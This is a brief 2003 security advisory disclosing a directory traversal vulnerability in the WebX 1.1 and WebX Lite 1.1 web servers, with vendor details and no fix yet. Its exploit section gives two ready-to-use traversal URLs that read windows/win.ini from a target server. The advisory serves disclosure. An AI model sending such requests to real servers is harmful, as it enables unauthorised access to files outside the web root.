WebX 1.1 and WebX Lite 1.1 web servers are vulnerable to a directory traversal attack that allows a remote attacker to access any files outside of the web root.
7014784cf66c6d123c7d3916676819429d1d52080f19f20f5455df1029596905
hello,
i am sending you a security advisory for WebX lite 1.1 web server.
----
-=- Freedom of Voice - Freedom of Choice =-
------------------------------------------------------------------
http://members.lycos.co.uk/r34ct/ security advisory
------------------------------------------------------------------
dr_insane - dr_insane@pathfinder.gr
September 8, 2003
Vunerability:
----------------
1) Directory Traversal attacks
Product:
--------
WebX Lite 1.1 web server
WebX 1.1 web server
Description of product:
-----------------------
Using WebX Lite could not be simpler. First set the basic parameters of a web server, choose the Server Port and the Virtual Path where you web pages are located. Then start the server. That is it.
You can easily add web based administration/configuration, client access, and reporting features to existing applications while reusing existing subroutines, functions and classes. And the best part, you can do all this while still working in the development environment of your choice, whether it is Visual Basic, Visual C++, Delphi, or any environment that supports ActiveX controls.
VUNERABILITY / EXPLOIT
======================
where to start...
1) http://[target]/../../../../../../../../../../windows/win.ini
2)http://[target]/.../.../.../.../.../.../.../windows/win.ini
Local:
------
not realy
Remote:
-------
real bad
Vendor Fix:
-----------
Not yet
Vendor Contact:
---------------
http://www.futurewavetech.com/
support@futurewavetech.com
Credits:
--------
dr_insane
http://members.lycos.co.uk/r34ct/